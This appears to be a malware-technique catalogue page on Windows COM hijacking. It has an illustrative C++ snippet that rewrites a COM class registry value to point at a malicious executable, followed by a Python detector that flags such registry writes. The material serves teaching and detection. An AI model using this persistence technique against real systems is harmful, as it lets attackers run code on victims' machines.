Windows C++ / COM Hijacking
Author | Thomas Roccia (fr0gger)
Platform | Windows
Language | C++
Technique | COM Hijacking
Description:
This code opens the registry key for a COM object and overwrites its default value with the path to a malicious executable. When the COM object is later used, the malicious code runs instead of the legitimate system component.
Code
#include <Windows.h>
#include <atlbase.h>

// MyCOMObject and IMyCOMObject are not declared in this snippet; they stand in for
// the targeted COM class and its interface.
int main()
{
    // Modify the Windows Registry to replace the reference to a legitimate system component with the path to the malicious executable
    HKEY hKey;
    // The ANSI (A) variants are called explicitly because the arguments are narrow string literals
    LONG lResult = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Classes\\MyCOMObject", 0, KEY_WRITE, &hKey);
    if (lResult == ERROR_SUCCESS)
    {
        // An empty value name writes the key's default value; sizeof includes the terminating NUL
        RegSetValueExA(hKey, "", 0, REG_SZ, (BYTE*)"C:\\MaliciousCode.exe", sizeof("C:\\MaliciousCode.exe"));
        RegCloseKey(hKey);
    }

    // Use the COM object as normal
    CComPtr<IMyCOMObject> pMyCOMObject;
    HRESULT hr = pMyCOMObject.CoCreateInstance(__uuidof(MyCOMObject));
    if (SUCCEEDED(hr))
    {
        // When the COM object is executed, the malicious code will be run instead of the legitimate system component
        pMyCOMObject->DoSomething();
    }
    return 0;
}
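The detection side of the registry write shown above, as an added example that is not part of the original page: it scans registry value-set events for class registrations repointed to a binary outside trusted install directories. The event layout (EventID 13 with TargetObject and Details fields) is modelled on Sysmon as an assumption, and the function names, trusted-directory list and sample events are constructed for illustration.

```python
import ntpath
import re

# Install locations treated as trusted (assumption; tune per environment).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# COM class registrations: machine-wide (HKLM\SOFTWARE\Classes) and per-user (<SID>_Classes).
CLASSES_RE = re.compile(r"\\software\\classes\\|_classes\\", re.IGNORECASE)
# First binary path inside the written value, whether or not it is quoted.
BINARY_RE = re.compile(r'([a-z]:\\[^"]*?\.(?:exe|dll|ocx|scr))', re.IGNORECASE)


def written_binary(details):
    """Return the normalised, lowercase binary path in a registry value, or None."""
    expanded = re.sub("%systemroot%", lambda _: "C:\\Windows", details, flags=re.IGNORECASE)
    match = BINARY_RE.search(expanded)
    # normpath collapses "..", so C:\Windows\..\Users\x.dll cannot pass as trusted.
    return ntpath.normpath(match.group(1)).lower() if match else None


def suspicious_com_writes(events):
    """Return (key, binary) for value-set events that repoint a class outside trusted dirs."""
    hits = []
    for ev in events:
        key = ev.get("TargetObject", "")
        # 13 = registry value set; ignore other events and keys outside the Classes hives.
        if ev.get("EventID") != 13 or not CLASSES_RE.search(key):
            continue
        binary = written_binary(ev.get("Details", ""))
        if binary and not binary.startswith(TRUSTED_PREFIXES):
            hits.append((key, binary))
    return hits


# Constructed sample events; the first uses the key and path from the code above.
SAMPLE_EVENTS = [
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Classes\MyCOMObject\(Default)",
     "Details": r"C:\MaliciousCode.exe"},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InprocServer32\(Default)",
     "Details": r"%SystemRoot%\System32\example.dll"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-0-0-0-1001_Classes\CLSID\{00000000-0000-0000-0000-000000000002}\InprocServer32\(Default)",
     "Details": r"C:\Windows\..\Users\Public\x.dll"},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Example\Settings\ToolPath",
     "Details": r"C:\Temp\tool.exe"},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000003}\LocalServer32\(Default)",
     "Details": r'"C:\Program Files\App\app.exe" /automation'},
]

if __name__ == "__main__":
    for key, binary in suspicious_com_writes(SAMPLE_EVENTS):
        print(f"ALERT {key} -> {binary}")
```

Only the first and third sample events are reported; legitimate installers also write under these keys, so in practice the trusted-directory list is combined with an allowlist of known writers.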
Created
December 29, 2022
Last Revised
April 22, 2024